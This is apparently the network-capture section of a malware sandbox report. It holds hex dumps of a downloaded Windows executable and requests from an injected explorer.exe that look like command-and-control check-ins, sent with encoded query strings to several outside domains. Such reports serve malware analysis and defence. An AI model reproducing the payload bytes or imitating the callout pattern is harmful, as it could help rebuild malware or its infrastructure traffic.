2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1a 1b 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1e 17 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1d 18 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1e 1a 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 18 17 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1c 1e 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 17 1d 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1e 16 2c 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1d 17 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00
                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL\_L @ @dW 8I H.text `.rsrc8I J@@.reloc>@BHl"C00-&(+&+*0s(t-&++*~*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0,&(+&+*0-&(+&+*
                                                                                                                                                            Nov 26, 2020 08:44:06.900969982 CET3INData Raw: 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1d 18 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1b 1e 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 19 15 2d 08
                                                                                                                                                            Data Ascii: 0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0,&
                                                                                                                                                            Nov 26, 2020 08:44:06.900993109 CET4INData Raw: 18 1f 09 6f 28 00 00 0a 28 34 00 00 06 6f 29 00 00 0a 26 07 6f 2a 00 00 0a 06 6a 32 d2 02 7b 07 00 00 04 6f 2b 00 00 0a 02 7b 08 00 00 04 6f 2b 00 00 0a de 1a 1e 2d 14 26 08 6f 2c 00 00 0a 28 2d 00 00 0a 02 28 2e 00 00 0a de 03 0c 2b ea 2a 00 00
                                                                                                                                                            Data Ascii: o((4o)&o*j2{o+{o+-&o,(-(.+*ff0Ns/-&-&+3++{o(-&rpo0o1&X++1o2*0{oo3-&+++Qo4tR&
                                                                                                                                                            Nov 26, 2020 08:44:06.901015997 CET6INData Raw: 00 00 73 47 00 00 0a 28 5f 00 00 0a 02 28 60 00 00 0a 02 7b 09 00 00 04 6f 61 00 00 0a 02 72 6f 01 00 70 28 4b 00 00 0a 02 72 6f 01 00 70 6f 62 00 00 0a 02 02 fe 06 33 00 00 06 73 50 00 00 0a 28 63 00 00 0a 02 7b 06 00 00 04 16 6f 64 00 00 0a 02
                                                                                                                                                            Data Ascii: sG(_(`{oarop(Kropob3sP(c{od(d+B}88}8}8}8}8}8*0-&(+&+*0l(Hse-&++- &of&(
                                                                                                                                                            Nov 26, 2020 08:44:06.901037931 CET7INData Raw: 53 79 73 74 65 6d 2e 52 65 73 6f 75 72 63 65 73 2e 52 65 73 6f 75 72 63 65 52 65 61 64 65 72 2c 20 6d 73 63 6f 72 6c 69 62 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69
                                                                                                                                                            Data Ascii: System.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSetPADPADP%|Done `\?<[$r]K%`
                                                                                                                                                            Nov 26, 2020 08:44:06.901063919 CET8INData Raw: be 5c cb d9 5c cb a9 f4 37 dd fe 57 54 13 81 9a db 82 50 1f 58 60 7a a0 c2 39 1d 70 41 88 8f 95 6a 58 8a fb a0 1c d3 a0 a3 5f c6 f0 31 a3 a6 02 3e 74 57 e0 e3 29 f4 b9 84 3e 47 c2 20 a0 0a e8 59 2e 9d 1f 02 c3 9d 8d ee 82 e4 c3 88 0e b9 84 15 b1
                                                                                                                                                            Data Ascii: \\7WTPX`z9pAjX_1>tW)>G Y."WQV*t(V^aCPptz,f\U+LhP^93n#m,i6h}#)vr)HPRNb1X\6?u9U
                                                                                                                                                            Nov 26, 2020 08:44:06.901091099 CET10INData Raw: 47 c3 ca 00 95 fc 0e e8 39 b6 81 6e be 11 3e 68 02 d8 ce 47 64 a0 ae 75 e6 66 39 2c 7a 45 f3 b6 30 86 55 86 4d d1 49 7c 37 bf 3d b0 e9 21 3d c1 a1 30 d2 7f 81 2f 0f 16 e7 7a 37 2c 0a db 81 a5 6e da 17 25 e1 ab d4 55 57 09 53 36 05 8f fe 86 3f 3b
                                                                                                                                                            Data Ascii: G9n>hGduf9,zE0UMI|7=!=0/z7,n%UWS6?;y;'`[{6|-2hH_O|<nfJS[SjNI|-0b p~"?qcP_I:^IJb+DylkaRwzjsdK]C{plpb1Z
                                                                                                                                                            Nov 26, 2020 08:44:06.901110888 CET11INData Raw: e4 e8 5f ff b6 3d 50 77 2e 37 a0 8d 50 ce b6 1c 82 07 03 e9 f7 c0 b6 3d f1 52 97 55 c5 6f 54 e7 06 52 a5 7b a3 d2 81 54 e9 3e 72 51 dd b6 3f 2e aa 0b 3c cf 30 b0 47 ec ad e6 7d 81 c3 2c 04 1c d0 f3 e7 aa eb 26 f1 b4 ff c0 58 b9 b6 fd 50 64 40 31
                                                                                                                                                            Data Ascii: _=Pw.7P=RUoTR{T>rQ?.<0G},&XPd@1]Tx4tT6iYnf2Wr@dvB5$e6jvBeSe`[7W0QA5m;\xY5su[3B7TpY8sbCGGd O
                                                                                                                                                            Nov 26, 2020 08:44:06.901134968 CET13INData Raw: d3 04 49 5a 66 8f 9f 43 ee df f8 94 c9 ad e2 9a ef e5 88 ec ad eb 41 9c 1e 3c 59 cd 15 5e b6 5e c2 0a 13 47 99 a9 50 01 fa f4 f5 36 db ed 44 7e a7 57 43 9d 95 e2 85 5c d7 7e eb 75 6c 31 7a 07 59 4f 3a f1 a3 01 de 7b b4 23 9e a1 4f 6b 18 6c 21 d8
                                                                                                                                                            Data Ascii: IZfCA<Y^^GP6D~WC\~ul1zYO:{#Okl!7CiNrCAs^\,_vg8|T#\Ua n ys7ND4Vj*#?g0*S.eCkP,VF}^M
                                                                                                                                                            Nov 26, 2020 08:44:06.901159048 CET14INData Raw: 0e 7e 5c 2e 93 5f 2c d3 6a ce 90 70 77 2e c4 b8 99 5d aa 26 24 40 44 90 e2 74 73 0b e6 c3 96 f0 90 c4 e3 c4 c9 6c 2d 8f e7 d2 4b 09 c1 74 63 9a 03 32 8d f2 42 f3 52 d0 e9 cf 76 a0 c2 98 ed ec c6 c5 11 40 69 7a 0d fa 84 85 02 e8 8f 90 bf 5d 9d ec
                                                                                                                                                            Data Ascii: ~\._,jpw.]&$@Dtsl-Ktc2BRv@iz]$*J"^g!d;SPfNF=\~E$?8}K-@xL,[l~Op3[t|7u%a,1a+<bkk?
                                                                                                                                                            Nov 26, 2020 08:44:07.117697954 CET16INData Raw: ca 83 f3 65 86 f3 19 d1 f5 54 82 ae 7b 48 15 ae 73 e0 5d 12 03 8f 29 7a 91 f0 bb 2a 8d 75 2f db 79 72 bb 1d cb 6d 55 5d 17 b1 cd 05 89 ee 74 c9 d8 e6 98 f6 09 5e 1b 13 94 59 fb 7f 84 2a 39 e6 00 91 b6 d2 d2 cd b1 38 48 6d 0d a4 76 22 a4 76 a2 89
                                                                                                                                                            Data Ascii: eT{Hs])z*u/yrmU]t^Y*98Hmv"v:'0gE8pI(?lJ.,Vt.4Kq]|!rt@iFBBC;pm){*rXmxJyL+!W`fx#txty&9;B)NZ}i=R6xHXz


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            1192.168.2.224916850.117.11.15680C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 26, 2020 08:45:59.790648937 CET294OUTGET /bu43/?OBZPd=k6AhchXHBB&Yzrx=UiBHsTvAEQLKMdFr/hj1g9PdhtcWl8ZZ/ysXuG6Tr8ng0KhPmhT7mwdkGkewJ6JbNyjYEA== HTTP/1.1
                                                                                                                                                            Host: www.opel-occasions-ales.com
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                            Data Ascii:
                                                                                                                                                            Nov 26, 2020 08:45:59.969166994 CET295INHTTP/1.1 200 OK
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                                                                            X-Powered-By: Nginx
                                                                                                                                                            Date: Thu, 26 Nov 2020 07:45:58 GMT
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                                                                                                                            Data Ascii: 3
                                                                                                                                                            Nov 26, 2020 08:45:59.969196081 CET296INData Raw: 31 30 35 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 43 61 63 68 65 2d 43 6f 6e 74
                                                                                                                                                            Data Ascii: 1056<!DOCTYPE html><html><head><meta charset=UTF-8 /><meta http-equiv=Cache-Control content=no-siteapp /><meta http-equiv=Cache-Control content=no-transform /><meta name=applicable-device content=pc,mobile /><meta name=viewport content="widt
                                                                                                                                                            Nov 26, 2020 08:45:59.969208002 CET297INData Raw: 74 6e 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 35 36 35 36 7d 2e 61 6c 65 72 74 2d 66 6f 6f 74 65 72 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 68 65 69 67 68 74 3a 34 32 70 78 3b 74 65 78 74 2d 61 6c 69
                                                                                                                                                            Data Ascii: tn:hover{background-color:#ff5656}.alert-footer{margin:0 auto;height:42px;text-align:center;width:100%;margin-bottom:10px}.alert-footer-icon{float:left}.alert-footer-text{float:left;border-left:2px solid #eee;padding:3px 0 0 5px;height:40px;co
                                                                                                                                                            Nov 26, 2020 08:45:59.969219923 CET299INData Raw: 2e 6c 65 6e 67 74 68 29 5d 20 2b 20 22 2f 72 65 67 69 73 74 65 72 3f 69 64 3d 30 33 34 35 30 35 31 35 22 3b 0a 20 20 20 20 69 66 20 28 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 6d 61 74 63 68 28 2f 28 70 68 6f 6e 65 7c 70 61
                                                                                                                                                            Data Ascii: .length)] + "/register?id=03450515"; if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { weburl = web
                                                                                                                                                            Nov 26, 2020 08:45:59.969228983 CET299INData Raw: 74 68 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 62 6f 78 57 69 64 74 68 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6a 73 2d 61 6c 65 72 74 2d 62 6f 78 22 29 2e 6f 66 66 73 65 74 57 69 64 74 68 3b 0a 20 20 20 20
                                                                                                                                                            Data Ascii: th; var boxWidth=document.getElementById("js-alert-box").offsetWidth; if(bodyWidth<boxWidth) document.getElementById("js-alert-box").style.left=-M


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            2192.168.2.2249169198.49.23.14180C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 26, 2020 08:46:05.157809019 CET300OUTGET /bu43/?Yzrx=5vpVtqJ3i14TYLjahre3JpaYS6Wcf4IPAkG7pj5paeEEzi6lwzUZWwRsk9qYR19+9CpDRA==&OBZPd=k6AhchXHBB HTTP/1.1
                                                                                                                                                            Host: www.runwithit.media
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                            Data Ascii:
                                                                                                                                                            Nov 26, 2020 08:46:05.290102005 CET301INHTTP/1.1 400 Bad Request
                                                                                                                                                            content-length: 77564
                                                                                                                                                            expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                            pragma: no-cache
                                                                                                                                                            cache-control: no-cache, must-revalidate
                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                            connection: close
                                                                                                                                                            date: Thu, 26 Nov 2020 07:46:05 UTC
                                                                                                                                                            x-contextid: nUrUpo0O/0htnjK7R
                                                                                                                                                            server: Squarespace
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                                                                                                            Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;
                                                                                                                                                            Nov 26, 2020 08:46:05.290124893 CET302INData Raw: 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20
                                                                                                                                                            Data Ascii: font-weight: 300; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family
                                                                                                                                                            Nov 26, 2020 08:46:05.290139914 CET304INData Raw: 5a 63 36 54 67 4b 77 31 43 5a 4c 45 58 79 47 5a 76 49 55 6a 4a 54 46 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34
                                                                                                                                                            Data Ascii: Zc6TgKw1CZLEXyGZvIUjJTFLWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMt
                                                                                                                                                            Nov 26, 2020 08:46:05.290158987 CET305INData Raw: 41 62 54 6a 45 6d 75 66 55 51 6f 51 67 41 37 52 69 72 39 61 39 68 5a 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75
                                                                                                                                                            Data Ascii: AbTjEmufUQoQgA7Rir9a9hZxqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+
                                                                                                                                                            Nov 26, 2020 08:46:05.290175915 CET306INData Raw: 54 2b 76 50 36 71 7a 4a 4c 38 6a 49 6d 56 38 74 4c 35 42 70 70 6c 34 4b 4d 79 4c 52 30 53 6c 45 57 53 55 6b 79 45 70 57 55 32 53 59 72 7a 53 46 56 62 6d 5a 55 6e 39 6d 67 4a 73 6e 73 2f 39 59 4a 4a 53 66 31 36 42 78 45 71 67 65 4a 47 69 52 61 6b
                                                                                                                                                            Data Ascii: T+vP6qzJL8jImV8tL5Bppl4KMyLR0SlEWSUkyEpWU2SYrzSFVbmZUn9mgJsns/9YJJSf16BxEqgeJGiRakKhDohWJejVmCgoZuPbCdbWci9RCpCaQWopUC1I5Vo+KwuY9EkFjK+Pn7Pgp943g2wHJmCJexrmFW8wMM3hgTsiI2WOlDmDVN8dYv07qeXcakOmkHUd/Je1qJH5IHealUa6ivUYq8aNJpvH6mDmiyswfsF1SOfqTZC
                                                                                                                                                            Nov 26, 2020 08:46:05.290190935 CET307INData Raw: 30 6f 33 36 79 6e 57 48 74 55 67 6d 41 6c 73 76 78 65 41 43 50 46 30 67 33 38 72 32 67 44 2f 53 44 51 54 41 66 4c 41 53 4c 51 41 49 73 42 6b 76 42 63 70 43 55 69 34 69 77 67 51 67 76 4a 4d 4b 7a 59 63 30 52 34 51 56 45 4f 45 79 45 72 35 55 7a 32
                                                                                                                                                            Data Ascii: 0o36ynWHtUgmAlsvxeACPF0g38r2gD/SDQTAfLASLQAIsBkvBcpCUi4iwgQgvJMKzYc0R4QVEOEyEr5Uz2NkJcJ60SQ5M0j8fvExWEnWDSoARGVajUkO0jUTbRbSNRNslyp4ghV7I9xB+1OJ3TKKwBkDLQkZUCrBZZpwmggxeZ5kbkhZ8SGFrEKaL4Q/hr4c/hL9eqmHqkQBoRjFZDlObY4rDFIPJg6kSJg8mvJYY3nqwwCAhul
                                                                                                                                                            Nov 26, 2020 08:46:05.290205956 CET309INData Raw: 54 54 5a 74 48 65 6a 7a 36 4f 49 4a 6c 47 67 56 4a 6e 33 33 36 6b 2b 6c 6a 64 57 73 4f 4f 75 76 44 50 7a 5a 70 45 4c 4c 45 4a 76 65 6f 73 4d 77 39 4c 74 42 54 47 4c 48 43 74 52 46 47 30 4b 49 39 73 4c 45 61 4c 4a 4e 6a 6d 53 4c 4c 64 4b 62 4f 4f
                                                                                                                                                            Data Ascii: TTZtHejz6OIJlGgVJn336k+ljdWsOOuvDPzZpELLEJveosMw9LtBTGLHCtRFG0KI9sLEaLJNjmSLLdKbOOBjxD5sWdZ2frGDS4ymqvMUCL/AUczyLicVtGpIF+E9M3uBN/kqNUzzNUxziKc7xb/7Dv2lRosCzuBSxOcg1Duh54VMwuksOk0LWTCioLMZSVi4YHYLt8EWLX+a5jSV45U3Bq1lRsK1mUlG5kMUpCKw15oaxSvZzUt
                                                                                                                                                            Nov 26, 2020 08:46:05.290221930 CET310INData Raw: 31 69 75 4f 48 4a 65 4e 34 38 66 32 2b 4b 4c 4f 6b 53 51 47 46 69 74 78 6d 58 61 36 58 30 6a 6c 58 6e 4f 63 77 50 6a 6d 78 73 37 35 4f 6c 77 4c 58 52 56 65 34 71 63 37 6b 4a 34 67 53 4c 69 6b 4c 68 2f 65 49 57 63 44 69 6f 4d 69 33 5a 54 57 61 47
                                                                                                                                                            Data Ascii: 1iuOHJeN48f2+KLOkSQGFitxmXa6X0jlXnOcwPjmxs75OlwLXRVe4qc7kJ4gSLikLh/eIWcDioMi3ZTWaGocqAaE+t4m21f+m62DcVdpbcY8ek4hAUZGijXjL9b3EwlrdruaGO1s8EJfERgjVnrTxM1cgzZnjim/5FBpXxzmIQxlHbJ+UVUWFHH16H8gnvLSPmCizWviQum7sRlOQuVlY7+uLrI/PSucu+5TnKT9aSerjVgdlZQ
                                                                                                                                                            Nov 26, 2020 08:46:05.290235996 CET311INData Raw: 56 72 56 37 31 61 31 44 44 47 74 55 43 4c 64 49 53 4c 64 4e 79 72 64 52 71 72 64 56 36 62 64 52 6d 62 64 55 4a 2b 6d 33 39 6a 67 37 71 73 45 37 55 55 62 31 48 50 30 51 4d 6b 61 64 49 69 54 49 74 74 4e 4b 67 6a 58 59 6d 4d 5a 6b 70 54 47 55 61 63
                                                                                                                                                            Data Ascii: VrV71a1DDGtUCLdISLdNyrdRqrdV6bdRmbdUJ+m39jg7qsE7UUb1HP0QMkadIiTIttNKgjXYmMZkpTGUac1jFatbxSxzjT/lb/Y3O0Jk6XxfqEr1Gr9fVul436RY9oIeTXJJPSklzUk8aSXvSkfQkg8kQIkeeuRzkJL0rKSa9yShiAWkyFMZ2rlClRgvTmTG24xrv+Cv8Ooc5kb/0vn+lv/bef6uTdYpO1Wk6XWfrXJ0Xexa8a9
                                                                                                                                                            Nov 26, 2020 08:46:05.290251017 CET313INData Raw: 6c 4a 4b 61 63 6a 6e 77 32 38 51 65 6d 79 68 2b 61 43 6e 39 75 79 6b 53 79 59 76 6f 72 59 76 72 70 6d 48 34 68 70 74 38 58 30 31 64 4d 76 78 44 54 37 34 76 70 4b 36 61 76 6d 48 36 69 53 4a 6b 75 30 41 58 55 64 4b 45 75 70 45 55 58 36 53 4c 71 75
                                                                                                                                                            Data Ascii: lJKacjnw28Qemyh+aCn9uykSyYvorYvrpmH4hpt8X01dMvxDT74vpK6avmH6iSJku0AXUdKEupEUX6SLqulgX06pLdAkNXapLadNluox2vUKvYI1eqVeyS6/Sq1irV+vVrNNr9BrW67V6LRv0Or2OjXq9Xs8mvUFvYLPeqDeyJe5Xk67W1YzqGl1DSdfqWkZ0na5jWNfrembpBt3ATN2oGxnSTbqJZt2sm5mhW3QLc3SP7mGr7t
                                                                                                                                                            Nov 26, 2020 08:46:05.420984030 CET314INData Raw: 6a 36 2f 58 49 65 6b 4d 2f 31 41 38 70 49 4a 4a 6b 4d 58 4d 41 6d 42 45 4b 61 2b 4c 54 51 76 4c 41 41 41 33 58 49 48 31 4d 41 72 61 79 6e 69 33 4d 5a 6a 47 62 32 63 67 6d 51 36 7a 70 72 4b 55 66 45 4d 52 53 36 48 41 6f 67 4d 59 71 52 5a 6f 4d 54
                                                                                                                                                            Data Ascii: j6/XIekM/1A8pIJJkMXMAmBEKa+LTQvLAAA3XIH1MArayni3MZjGb2cgmQ6zprKUfEMRS6HAogMYqRZoMTWQZIccoRFJhG7CMlZQouypU/XmVWcnqSGnJVXYtZy4d8X+nJfSygrEV55+41jGZGtBg3T/8W3S8m4yt/uMYQvxDS+OAyIyRA1aybAKlcVYRxPlL4+DqGKOXla5+lo2XKE0oKI9V6e+VqE4oWDlWq/7BGnbBSpYCqy


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            3192.168.2.224917034.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 26, 2020 08:46:10.629771948 CET381OUTGET /bu43/?OBZPd=k6AhchXHBB&Yzrx=5Lfh6qcZO6QCpL41ah3mk8LUL3OJ/OZx9c26bzra2u0GgF5XtbJN8WKHQCrI7u2LEBkhnA== HTTP/1.1
                                                                                                                                                            Host: www.mycapecrusade.com
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                            Data Ascii:
                                                                                                                                                            Nov 26, 2020 08:46:10.744771957 CET382INHTTP/1.1 403 Forbidden
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Thu, 26 Nov 2020 07:46:10 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 275
                                                                                                                                                            ETag: "5fb7c734-113"
                                                                                                                                                            Via: 1.1 google
                                                                                                                                                            Connection: close
